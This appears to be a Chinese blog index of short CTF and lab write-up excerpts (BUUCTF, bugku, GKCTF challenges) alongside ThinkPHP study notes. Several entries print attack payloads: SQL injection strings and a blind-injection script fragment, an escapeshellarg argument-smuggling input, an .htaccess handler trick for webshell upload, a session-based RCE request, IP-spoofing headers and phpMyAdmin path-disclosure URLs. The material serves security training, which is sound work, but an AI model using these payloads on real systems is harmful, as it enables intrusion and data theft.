
PHP
偷一个月亮
爱搞事的web狗~
展开
-
网鼎2018 fakebook
文件泄露 user.php.bakhttp://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/user.php.bak在其中发现curl sql注入 http://41883a16-5c35-4b04-a04f-897cfee192b5.node3.buuoj.cn/view.php?no=1'字段数http://41883a16-5c35-4b04-...原创 2020-09-02 12:59:10 · 321 阅读 · 0 评论 -
极客大挑战 2019]PHP CVE-2016-7124 绕过__wakeup()
极客大挑战 2019]PHP扫描发现备份源代码www.zip注意 private私有属性,不能从外面去更改访问只能从内部函数里面进行更改源代码如下:__wakeup()是被反序列后自动调用的函数。自动将属性改为guest但是和后面的admin有所冲突。O:4:"Name":2:{s:14:"�Name�username";s:5:"admin";s:14:"�Name�password";...原创 2020-09-02 10:11:42 · 1061 阅读 · 0 评论 -
PCTF 神盾局的秘密
http://web.jarvisoj.com:32768/文件包含读源码index.php<?phprequire_once('shield.php');$x = new Shield();isset($_GET['class']) && $g = $_GET['class'];if (!empty($g)) {$x = unserialize(...原创 2020-09-02 09:36:46 · 539 阅读 · 0 评论 -
[GKCTF2020]cve签到 详细题解
http://96c443e2-806a-40a2-85f3-0b94014d4a19.node3.buuoj.cn/?url=http://127.0.0.123%00www.ctfhub.com知识点原创 2020-09-02 08:47:47 · 525 阅读 · 0 评论 -
[BUUCTF 2018]Online Tool 题解
传入的参数是:172.17.0.2' -v -d a=1经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.es...原创 2020-09-01 22:18:27 · 791 阅读 · 0 评论 -
[GKCTF2020]CheckIN bypass_php7_disable_functions
[GKCTF2020]CheckIN<title>Check_In</title><?phphighlight_file(__FILE__);class ClassName{public $code = null;public $decode = null;function __construct(){$this->code = ...原创 2020-09-01 20:25:09 · 488 阅读 · 0 评论 -
[HCTF 2018]WarmUp 题解
[HCTF 2018]WarmUp<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($pag...原创 2020-09-01 19:26:47 · 2320 阅读 · 0 评论 -
[SUCTF 2019]CheckIn .user.ini 题解
这得从php.ini说起了。php.ini是php默认的配置文件,其中包括了很多php的配置,这些配置中,又分为几种:PHP_INI_SYSTEM、PHP_INI_PERDIR、PHP_INI_ALL、PHP_INI_USER。 在此可以查看:http://php.net/manual/zh/ini.list.php这几种模式有什么区别?看看官方的解释:其中就提到了,模式为PHP_INI_USER的配置项,可以在ini_set()函数中设置、注册表中设置,再就是.user.ini中设置。 这里就..原创 2020-09-01 16:29:16 · 379 阅读 · 0 评论 -
[GXYCTF2019]BabyUpload 题解
方法一:<FilesMatch"wen">SetHandlerapplication/x-httpd-php</FilesMatch>方法二:首先上传随意后缀名木马更改.htaccess文件访问测试虽然未解码,其实已经附着,可以使用一句话木马三个获取文件内容得函数...原创 2020-09-01 15:29:59 · 3387 阅读 · 0 评论 -
极客大挑战 Knife 详细题解
Syc=print_r(scandir('/'));数组列目录原创 2020-09-01 12:02:26 · 328 阅读 · 0 评论 -
[GXYCTF2019]禁止套娃 利用sessions无参rce
[GXYCTF2019]禁止套娃git泄露GET /?exp=show_source(session_id(session_start())); HTTP/1.1原创 2020-09-01 11:50:42 · 232 阅读 · 0 评论 -
2019强网杯 随便注 堆叠注入
堆叠注入未过滤 alert rename show正则匹配过滤掉了经常使用的查询关键字,但是并没有禁用show,那么可以试下堆叠查询。?inject=0'; show databases;%23http://874c5b38-9383-4b54-959f-22876b22bb0c.node3.buuoj.cn/?inject=-1'; show databases; %23http://874c5b38-9383-4b54-959f-22876b22bb0...原创 2020-09-01 11:13:54 · 272 阅读 · 0 评论 -
[GWCTF 2019]枯燥的抽奖 php伪随机数
php伪随机数种子爆破可以看到前面市一样的原创 2020-08-31 18:05:32 · 403 阅读 · 0 评论 -
[ 2019ASISCTF]Unicorn shop UTF8绕过
UTF-8 Encoding: 0xE2 0x86 0x82转换为url编码原创 2020-08-31 17:40:17 · 430 阅读 · 0 评论 -
常用请求伪装头
X-Forwarded-For:127.0.0.1X-Forwarded:127.0.0.1Forwarded-For:127.0.0.1Forwarded:127.0.0.1X-Forwarded-Host:127.0.0.1X-remote-IP:127.0.0.1X-remote-addr:127.0.0.1True-Client-IP:127.0.0.1X-Client-IP:127.0.0.1Client-IP:127.0.0.1X-Real-IP:127.0.0.1Ali-原创 2020-08-31 17:04:48 · 1058 阅读 · 0 评论 -
phpmyadmin爆破绝对路径
phpmyadmin爆绝对路径phpMyAdmin/libraries/select_lang.lib.phpphpMyAdmin/darkblue_orange/layout.inc.phpphpMyAdmin/index.php?lang[]=1phpMyAdmin/themes/darkblue_orange/layout.inc.php转载链接:https://www.jian...原创 2020-04-16 09:46:52 · 4135 阅读 · 0 评论 -
Homeless靶场笔记
加载开启镜像原创 2020-04-13 11:53:59 · 365 阅读 · 1 评论 -
Wpscan对WordPress渗透测试列用户
WordPress是一个专注于PHP和MySQL的免费在线开源内容托管系统。这是一个功能强大且使用最多的博客工具。由于WordPress使用过程中出现了太多的错误,所以需要提高安全性。WordPress渗透测试对于发现漏洞并保护您的WordPress博客非常重要。安全研究人员丹尼尔·西德说,在2016年,至少有15769个甚至更多的WordPress网站已经被入侵。根据Sucuri报告可知,...转载 2020-04-02 14:17:42 · 772 阅读 · 0 评论 -
ThinkCMF框架任意文件包含 漏洞复现
0x01 简介ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。但是由于代码漏洞,可以构造恶意url造成文件包含/上传漏洞。0x02 漏洞版本ThinkCMF X1.6.0ThinkCMF X2.1.0ThinkCMF X2.2.0ThinkC...原创 2020-03-16 10:42:37 · 1118 阅读 · 0 评论 -
34c3ctf/extract0r/
搭建环境问题一:使用Ubuntu17,发现源出现问题# apt-get updateHit:1 http://ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu zesty InReleaseIgn:2 http://cn.archive.ubuntu.com/ubuntu zesty InReleaseErr:5 http://cn....原创 2020-01-14 19:34:45 · 444 阅读 · 0 评论 -
Solr远程命令执行复现(cve-2019-0193)
环境搭建启动环境并创建集合docker-compose up -ddocker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db环境搭建完成漏洞利用查看模块名称构造包开启params.resource.loader.enabledPOST /solr...原创 2019-11-23 16:43:10 · 276 阅读 · 1 评论 -
vbulletin3数据库信息
vbulletin3数据库中比较重要的表adminlog、editlog、post、session、thread、useradminlogadminlogid,userid,dateline,script,action,extrainfo,ipaddresseditlogpostid,userid,username,dateline,reasonpostpostid,thread...原创 2019-11-23 09:44:45 · 486 阅读 · 0 评论 -
bugku login2
原创 2019-06-29 08:27:04 · 1019 阅读 · 0 评论 -
php二次注入
原创 2019-07-03 20:09:45 · 294 阅读 · 0 评论 -
bugku-sql注入2 (附详细代码)
构造select * from * where uname = $_POST[uname]uname=admin’-’此时uname=-1,不行$sql = select * from users where username=$username;在字符串username的值和数字0比较的时候,字符串变为了0故此0=0payload:admin’-(ascii(mid(R...原创 2019-06-20 22:14:42 · 2004 阅读 · 2 评论 -
bugku-多次 (详细)
第一个考点:异或注入判断过滤关键字?id=1’^(length(‘union’)!=0)–+过滤的用双写绕过GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7765623130...原创 2019-06-20 14:55:19 · 1894 阅读 · 0 评论 -
bugku-这是一个神奇的登陆框(附代码)(详细)
题目链接:http://123.206.87.240:9001/sql/数据库表名列名select flag代码admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GOadmin_name=admin" union select (s...原创 2019-06-20 12:29:05 · 922 阅读 · 0 评论 -
bugku-实战2-注入
news存在注入点,4个字段select tables 发现表太多了,显示不全这时用字符截断函数get flag原创 2019-06-29 08:31:39 · 351 阅读 · 0 评论 -
学thinkphp5 day1 环境安装&目录规范&url访问
composer安装初试写个方法注意:上面是TP默认的控制器的文件的目录,并该控制器文件首字母大写,同时没有类后缀。(以前:UserController.class.php)域名/index.php/index模块/index控制器/lst方法,这里TP5使用的phpinfo的模式进行URL的调度。自定义控制器编写打开调试模式,方便修改视图处理注意:在T...原创 2019-09-01 18:42:32 · 141 阅读 · 0 评论 -
学thinkphp5 day2 rewrite规则&路由定义&路由分组和参数设定
rewrite规则隐藏入口文件.HTACCESS(需要Apache的Rewrite模块)这样不用加index.php,缩减url长度定义路由一定义路由参数路由和方法里的参数必须一致,否则无法传参。除了上面的方式可以定义路由外,还有其他的方式定义路由,使用系统自带的Route路由类闭包函数路由进行响应匿名函数路由路由参数单独在建立一个Blog的控...原创 2019-09-01 23:22:18 · 203 阅读 · 0 评论 -
学thinkphp5 day3 接收请求&返回响应&重定向
##接收GET请求在TP5里面接收用户的请求数据可以使用如下的方式进行处理:一、Request的实例a) $request = Request::instance()二、在控制器里面继承基类控制器a) $this->request()->param(‘参数’)三、使用 input() 函数(注意: 在TP5里面已经不能在使用Tp3.2里面的I函数)四、参数的依赖注入...原创 2019-09-02 14:41:41 · 466 阅读 · 0 评论 -
学thinkphp5 day4 数据库操作
学thinkphp5 day4 数据库操作数据库配置mysql查询操作因为新建数据库没有表,临时创建一个表sh_admin;增删改操作运用构造器-查询获取所有数据条件获取构造器-添加构造器-更新构造器-删除别名处理(区分name和table方法)table方法必须指定完整的数据表名如果设置了数据表前缀参数的话,可以使用name...原创 2019-09-02 19:56:08 · 155 阅读 · 0 评论 -
学thinkphp5 day5 模型学习-模型定义\增加\查看
需要写在模块的model目录下注意1:在TP5里面模型也不在使用类后缀,直接就是使用去除表前缀后的名称作为模型的名称。(模型名称使用大驼峰的方式)例如:表的名称为 sh_admin 对应的模型文件名称 Admin.php例如:表的名称为 sh_goods_attribute 对应的模型文件名称 GoodsAttribute.php定义sh_user表建一个和模型同名(不包括前缀)的表...原创 2019-09-03 22:12:00 · 244 阅读 · 0 评论 -
学thinkphp5 day6 模型获取更新和删除
1原创 2019-09-04 10:14:33 · 162 阅读 · 0 评论 -
学thinkphp5 day7 模型关联(附学习代码)
模型关联注意:在TP里面的模型关联没有laravel里面那么好用,简单的了解即可,一般来说,还是建议自己在代码里面完成模型间的关系处理。不要过来的依赖模型关联。关联查询先建立两个表后期关联用User里面关联profile查询关联信息获取关联对象查询直接使用原生sql语句模型的链式操作关联添加user_id 和id关联起来了所以调用User模型里面的p...原创 2019-09-04 15:55:56 · 318 阅读 · 0 评论 -
bugku-INSERT INTO注入(附代码) 详细
# -*-coding:utf-8-*-# author : wen# flag:wen{b7bb30b3435f2e7c418b131f9e789f81}import requestsimport timeurl = 'http://123.206.87.240:8002/web15/'payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHI...原创 2019-06-19 21:32:36 · 698 阅读 · 0 评论